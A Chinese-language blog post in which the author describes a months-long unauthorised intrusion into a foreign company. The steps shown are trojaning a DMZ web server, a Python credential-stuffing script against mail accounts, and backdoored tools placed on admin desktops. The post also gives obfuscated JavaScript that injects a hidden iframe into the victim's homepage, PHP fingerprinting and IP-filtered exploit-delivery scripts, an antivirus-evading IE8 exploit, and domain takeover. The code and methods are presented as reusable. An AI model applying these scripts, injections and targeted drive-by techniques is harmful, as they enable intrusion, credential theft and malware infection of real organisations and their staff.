文章均由自己原创，只是一直没有在自己博客发表。本地附件也没有了，我是从网上找来我的以前的投稿。

写在之前的废话：小菜技术能力不行，如果你觉得此文实在看不下去，还请PASS掉。如果你对我的文章有兴趣，可以与我一起交流。文章因为敏感无图，业内人士看看自然懂。

由于XXX耗时长，需要的支持多，而且目标敏感。在这里，我们不便介绍目标背景，也不多说其他的，直接来进入主题。

某国某目标，我盯了它大概半年。嗯，终于有一天，我觉得时机成熟，下手吧。

在渗透目标的前期，我们需要了解对方公司的安全意识。以及需要搜集所有网站的IP，公司的出口，以及公司网段所存在的B-C段，公司人员邮箱，公司人员爱好，facebook等信息。

首先，我把目标公司的WEB都给搜集好了，大公司一般C段都是在一起的。而我有个习惯，在渗透目标的时候，先喜欢把OWA的段找出来扫一下。这样大概的就知道了公司的架构情况。而很多时候，大公司都是会把WEB段给区分的，哪几个外网IP段是管理WEB的，哪几个段是放数据库的。不过随着网络越趋复杂，就算拿到了WEB 也就是在DMZ徘徊。不过只要拿到了WEB就好说了。Go把。

千辛万苦拿下来了这个公司的一个WEB，WEB如何拿下来咱们不多说。不是重点。当我分析内网情况的时候，环境就是在DMZ，system权限。通过判断协议，TCP HTTP都没问题。于是，我把DMZ WEB给中了一个马，这样更容易操作，至少得到了一个交互式的shell。先把远控抛开不说，通过netstat -ano分析。WEB服务器连上了在内部的一台数据库服务器。于是我找到了WEB服务器的web.config脚本，成功得到了数据库账户密码，但是数据库账户权限非SA，而且SQL SERVER版本是2008（悲剧，MSSQL 2000的话直接就远程溢出了）.没办法，就算我们导了个shell，又有何用？不着急，慢慢分析，于是我试着去ping内网数据库机器，PING不通，接着我在拿S扫描器开了很小的线程，扫了扫WEB连接的数据库那台机器。和我猜想的结果是一样，这种情况我不是第一次碰到了。就只有个1433能够过去。这时，我猜想大概的内网架构是这样的：

WEB–>防火墙–>数据库服务器–>内网（而当我搞下来，发现情况并不是这样的）

算了，没办法。先不管了，连上数据库，分析数据，看能否去撞号，登OWA或者邮箱之类的。

于是写了个PYTHON脚本，去跑他们的OWA（这个脚本是N年前写的，可能不太符合，大家去改改就好了。原理差不多）：

import smtplib ,sys ,timedef main():server = "smtp.live.com" #gmail smtp.gmail.com, yahoo smtp.mail.yahoo.comfp = open("D:\python\\hotmail.txt")fp1 = open("d:\python\\save.txt", 'a+')while 1:line = fp.readline()uandp = line.split(' ')name = uandp[0]name = name.split('@')[0]pwd = uandp[1]pwd = pwd.split("\n")[0]try:smtp = smtplib.SMTP_SSL(server,465)  # gmail 465except:print "[*]Connect Error."sys.exit(0)passtry:#smtp.set_debuglevel(1)#smtp.ehlo()#smtp.starttls()smtp.ehlo()smtp.login(name,pwd)except:print "[-]:%s:%s" % (name, pwd)pass#time.sleep(1)else:out = "[+]:%s:%s\n" % (name, pwd)print outfp1.write(out)fp1.flush()smtp.quit()smtp.close()fp.close()fp1.close()if __name__=="__main__":main()

分析完数据，把数据库中的目标人物邮箱都给挑选出来。跑完。手工测试VPN，都失败了。没办法，继续另寻其他的路子。

来回到远控，通过分析，本机WEB有一个员工登录的地方，但是是.NET的。不能改代码。因为如果改写代码，需要重新编译（这里可能我说的有错。）但是有一个员工登录的地方我们就已经足够了，这里也先不管它。先分析再说。

我的远控是可以切换用户的，只要有用户在，可以切换到对方的用户下。首先分析了本地管理组的用户，抓密码。Query user 发现有几个用户在线。于是我切换到每个用户，主要就是查看IPC 。功夫不负有心人，当我切换到B的会话下的时候，NET USE看了看。大家猜我看到了啥？（可能你会想，咱们不是在DMZ吗？会话咋来的？ 管理员从内网连过来。）

C:\ProgramData>net useNew connections will be remembered.Status       Local     Remote                    Network-------------------------------------------------------------------------------\\TSCLIENT\C              Microsoft Terminal Services\\TSCLIENT\D              Microsoft Terminal Services\\TSCLIENT\E              Microsoft Terminal Services\\TSCLIENT\F              Microsoft Terminal ServicesThe command completed successfully.

没错，管理员从内网连接过来，把盘给带过来了。这下有得玩了。于是我分析了连接过来的那个盘。通过netstat -ano 知道了带过盘来的那机器的IP。赶紧分析，知道了对方是管理员，在OWA的MAILBOX服务器上链接过来的。搞的多的就知道，MAILBOX是没WEB的，当然也有。MAILBOX主要的作用就是来存储MAIL的邮件数据。于是我CURL,S扫描了服务器的那个段。一样的，我DMZ怎么都过不去，而且对方常用端口也没开。如果开了，咱们直接复制个shell就过去，本地借用内网那台服务器执行命令就可以了。但是环境不允许我们这么容易就进入别人内网，扭转了几天，还是没办法，当我最后分析到另外一个盘符的时候，我竟然看到了IT服务器的一个盘，里面有IT部门的一部分密码。赶紧下载分析。这样，基本上我判断，域管可能在里面。于是我来到VPN，一个一个测试，竟然都失败了。心想：FUCK，肯定这个是一个小域，没有VPN可以有权限登录。然后在一个一个来测试OWA，竟然登录进去了一个。分析所有邮件，搜索关键字：PASSWORD FTP RDP SERVER,HACKER。等字眼。没有所获，就看到一封说近期有人在搞他们公司，需要加强安全防范的邮件（当然不是我。）。可能这时候很多人想：发邮件，绑马？ 如果说你有0DAY或者免杀好的NDAY可以这样做。不然就是找死了。

这个时候，我还是信心满满的，不是有IT部门的盘吗？ 嘿嘿，下载了几个常用的工具，比如VPN，补丁。绑马了，在传上去。还给CMD绑了个马，放到了MAILBOX的c:\users\**\desktop

把每个用户桌面上都放了一个CMD.EXE。就不相信管理员不运行。

等啊等啊，等了差不多半个月。没任何反映，决定还是自己出手。不然就被动，连WEB掉了都不好了。

从网上找代码，自己改写了一个PHP，在WEB服务器上挂了一个探针。这里有个小知识：WEB服务器不是http协议的，而是https来进行访问的，所以我们需要找一个https的网站（绿标的那种），不然你是探针不到任何信息的。说做就做，HTTPS绿标的网站我多的是，而PHP代码简单，改写代码如下：

function getBrowse() { global $_SERVER; $Agent = $_SERVER['HTTP_USER_AGENT']; $browser = ''; $browserver = ''; $Browser = array('Lynx', 'MOSAIC', 'AOL', 'Opera', 'JAVA', 'MacWeb', 'WebExplorer', 'OmniWeb'); for($i = 0; $i <= 7; $i ++){ if(strpos($Agent, $Browsers[$i])){ $browser = $Browsers[$i]; $browserver = ''; } } if(ereg('Mozilla', $Agent) && ereg('Maxthon', $Agent)){ $temp = explode('Maxthon/', $Agent); $Part = $temp[1]; $temp = explode(' ', $Part); $browserver = $temp[0]; $browser = 'Maxthon'; } if(ereg('Mozilla', $Agent) && ereg('Chrome', $Agent) && !ereg('Maxthon', $Agent)){ $temp = explode('Chrome/', $Agent); $Part = $temp[1]; $temp = explode(' ', $Part); $browserver = $temp[0]; $browser = 'Chrome'; } if(ereg('Mozilla', $Agent) && ereg('Opera', $Agent)) { $temp = explode('(', $Agent); $Part = $temp[1]; $temp = explode(')', $Part); $browserver = $temp[1]; $temp = explode(' ', $browserver); $browserver = $temp[2]; $browserver = preg_replace('/([d.]+)/', '\1', $browserver); $browserver = $browserver; $browser = 'Opera'; } if(ereg('Mozilla', $Agent) && ereg('MSIE', $Agent)){ $temp = explode('(', $Agent); $Part = $temp[1]; $temp = explode(';', $Part); $Part = $temp[1]; $temp = explode(' ', $Part); $browserver = $temp[2]; $browserver = preg_replace('/([d.]+)/','\1',$browserver); $browserver = $browserver; $browser = 'Internet Explorer'; } if($browser != ''){ $browseinfo = $browser.' '.$browserver; } else { $browseinfo = 'Unknow Browser'; } return $browseinfo; } function getIP() {return isset($_SERVER["HTTP_X_FORWARDED_FOR"])?$_SERVER["HTTP_X_FORWARDED_FOR"]:(isset($_SERVER["HTTP_CLIENT_IP"])?$_SERVER["HTTP_CLIENT_IP"]:$_SERVER["REMOTE_ADDR"]);}function getOS () { global $_SERVER; $agent = $_SERVER['HTTP_USER_AGENT']; $os = false; if (eregi('win', $agent) && strpos($agent, '95')){ $os = 'Windows 95'; } else if (eregi('win 9x', $agent) && strpos($agent, '4.90')){ $os = 'Windows ME'; } else if (eregi('win', $agent) && ereg('98', $agent)){ $os = 'Windows 98'; } else if (eregi('win', $agent) && eregi('nt 6.1', $agent)){ $os = 'Windows 7'; }else if (eregi('win', $agent) && eregi('nt 6', $agent)){ $os = 'Windows Vista'; }  else if (eregi('win', $agent) && eregi('nt 5.1', $agent)){ $os = 'Windows XP'; } else if (eregi('win', $agent) && eregi('nt 5', $agent)){ $os = 'Windows 2000'; } else if (eregi('win', $agent) && eregi('nt', $agent)){ $os = 'Windows NT'; } else if (eregi('win', $agent) && ereg('32', $agent)){ $os = 'Windows 32'; } else if (eregi('linux', $agent)){ $os = 'Linux'; } else if (eregi('unix', $agent)){ $os = 'Unix'; } else if (eregi('sun', $agent) && eregi('os', $agent)){ $os = 'SunOS'; } else if (eregi('ibm', $agent) && eregi('os', $agent)){ $os = 'IBM OS/2'; } else if (eregi('Mac', $agent) && eregi('PC', $agent)){ $os = 'Macintosh'; } else if (eregi('PowerPC', $agent)){ $os = 'PowerPC'; } else if (eregi('AIX', $agent)){ $os = 'AIX'; } else if (eregi('HPUX', $agent)){ $os = 'HPUX'; } else if (eregi('NetBSD', $agent)){ $os = 'NetBSD'; } else if (eregi('BSD', $agent)){ $os = 'BSD'; } else if (ereg('OSF1', $agent)){ $os = 'OSF1'; } else if (ereg('IRIX', $agent)){ $os = 'IRIX'; } else if (eregi('FreeBSD', $agent)){ $os = 'FreeBSD'; } else if (eregi('teleport', $agent)){ $os = 'teleport'; } else if (eregi('flashget', $agent)){ $os = 'flashget'; } else if (eregi('webzip', $agent)){ $os = 'webzip'; } else if (eregi('offline', $agent)){ $os = 'offline'; } else { $os = 'Unknown'; } return $os; }

这里贴的PHP代码并非完整的，大家可以自己去改写。

脚本的功能是获取来源IP,OS,浏览器版本等等。当然如果你觉得还少，你可以加入探针JAVA,FLASH的一些功能。这里不在多说。

于是来到WEB主站，查看主页调用的JS。在JS里插入一段混淆代码。

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('5.6("<1 4=\\"2://3//9.a\\" 7=0 8=0></1>");',11,11,'|iframe|https|xxx|src|document|write|height|width|Ie|php'.split('|'),0,{}))

而原型如下：

document.write("<iframe src=\"https://xxx//Ie.php\" height=0 width=0></iframe>");

接下来我们要做的就是分析来源IP，等待了几天以后。我查看了探针的地址。记录了不少IP.但是那么多IP应该如何来确定哪个是他们的出口IP呢？

没办法，偷懒把，写了个PYTHON脚本：

#!/usr/bin/env python#-*- coding:utf-8 -*-import sysimport threadingimport httplibimport reimport timeclass Myclass(threading.Thread):def __init__(self,host,path):threading.Thread.__init__(self)self.host = hostself.path = pathself.result = []def run(self):if "https://" in self.host:conn = httplib.HTTPSConnection(self.host,80,None,None,False,10)else:conn = httplib.HTTPConnection(self.host,80,False,10)i_headers = {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-Us; rv:1.9.1) Gecko/20090624 Firefox/3.5","Accept": "text/plain"}conn.request('GET',self.path,headers = i_headers)r1 = conn.getresponse()text = r1.read()text1 = text.lstrip()#size = text.count("\n")test = open('ip.txt','a+')test.write(text1)b = open("ip.txt",'r')c = open("ids.txt",'w')for line in b.readlines():m = re.search(r'(IP:\d*.\w*.\d*.\d*.\d*)',line)        mm =  m.group(0)owa = mm.replace("IP:","").strip().replace("\n","")self.result =  owa.replace("\n","")c.write(self.result)c.write("\n")#print "write success"g = open("ids.txt",'r')for lines in g.readlines():getsip =  lines.replace("\n","")try:conns = httplib.HTTPConnection("bgp.he.net",80,False,10)except Exception:print "[-]:connection out time"breakelse:conns.request('GET','/ip/%s' % getsip,headers = i_headers)r2 = conns.getresponse()texts = r2.read()try:line_split = re.search(r'(<u>.*\d+\D+.*.title=)',texts)obj =  line_split.group(0)print "server:",obj.replace("<u>","").replace("</u>","").replace("\n","").replace("(<a href=\"","search domain:").replace("\" title=","").replace("/dns/","")except Exception, e:passtime.sleep(5)#print line_splitdef main():if len(sys.argv) < 3:print "[*]:Usage python info.py 127.0.0.1 /path"sys.exit(1)Mythread = Myclass(sys.argv[1],str(sys.argv[2]))Mythread.start()if __name__ == "__main__":main()

这个脚本的功能是先把目标网站记录的IP地址全部给读取下来，在本地保存为TXT，在循环依次读取一个IP，来到接口bgp.he.net 这个接口查询。至于如何分辨公司出口IP，不在多说了。看IP信息以及访问源就知道了。

成功获取到对方公司的出口IP，接下来就好办了。知道对方用的浏览器版本，OS，等等。

于是先决定先测试ie8的漏洞，网上找了个IE8的漏洞。本地WIN7 XP测试没问题（因为对方公司还是有人在用IE8，win7默认就是IE8）。但是网上找的IE8的漏洞都是被杀的不行的，于是心想，自己做把。

于是网上找了一个BASE64 JS解密脚本，把IE8的网马内写了几个函数，把核心代码都给放到函数里。然后直接把函数内都给BASE64加密了。OK，很简单把，不杀了。

但是我们在挂马的时候，并不是瞎挂。而是必须有针对性的挂，不然你挂上，杀毒软件一下把你样本给抓走了。改天又出这报告又出那报告的。多丢人。那就得需要一个定向挂马的脚本了。因为对方的HTTPS的，我VPS上没装HTTPS的证书，心想，直接就通过WEBSHELL把这串代码放到绿标的HTTPS网站上就好了。

定向挂马脚本如下：

function check_ip(){$ALLOWED_IP=array('192.168.2.*','目标公司出口IP');$IP=getIP();$check_ip_arr= explode('.',$IP);if(!in_array($IP,$ALLOWED_IP)) {foreach ($ALLOWED_IP as $val){if(strpos($val,'*')!==false){$arr=array();$arr=explode('.', $val);$bl=true;for($i=0;$i<4;$i++){if($arr[$i]!='*'){if($arr[$i]!=$check_ip_arr[$i]){$bl=false;break;}}}if($bl){return;die;}}}header('HTTP/1.1 403 Forbidden');exit();die;} else{｝

脚本的else后头，就是调用的那个网马了。

我把这个脚本和IE网马都给放到了绿标的网站上，于是重新在目标网站上，把探针去了。加入咱们的PHP脚本地址，远程调用。接下来要做的事情就是等着把。

谁没成想：刚挂上没5分钟，目标公司人中了我的网马，上线了。擦噢，这人品，不是一般的好。

赶紧把代码给取了。做内网渗透去了。而当我们到达内网的时候，内网情况却是这样的

DMZ-> WAF-> mailbox(我来到了这台服务器上)-> IDS/IPS-> 另外的域-> 主域

妈的额，好麻烦。没办法啦。之前拿下来了IT的管理密码的清单，先把当前域搞下来再说。毫无悬念的，直接连上了当前的域，控制了OWA SERVER。擦屁股走人，远控上操作去了。

虽然拿下来了这个域，但是这个域内就那么几十台个人机，而目标公司是几万人，看样子这个是他们的一个分的部门。只有继续深入了。

接下来我们要找的就是其余域的其他网段了，我ping了下目标公司的主站www.xxoo.com,嗯，内网IP地址是10.xx.xx.xx，嗯，虽然能够PING通，但是IPC这些都是不行的。接下来要做的就是打入其他域，搞定其他域，慢慢深入。

于是把目标个公司所有域名全部给搜集起来，在内网一个一个ping，把返回是内网的IP地址都给记录下来。

然后把朋友写的扫描器，指定线程，上去扫常用的WEB框架，数据库之类的东西。

预知后事如何，还请听下回分解。谢谢。

目前主域已经搞下来了，但是无奈没域管，好不容易抓到。但是被BIT9发现我了，把我又T出来了。还是得慢慢来，不着急，慢慢分析把。下回且听分析如何绕过防范不严的BIT9。

很多人看了文章可能会觉得我说的太笼统了，倒是。我不可能那么详细的说出来一些东西，但是如果你能够在这个文章里学习到新的思路，那就是我写这个文章的目的。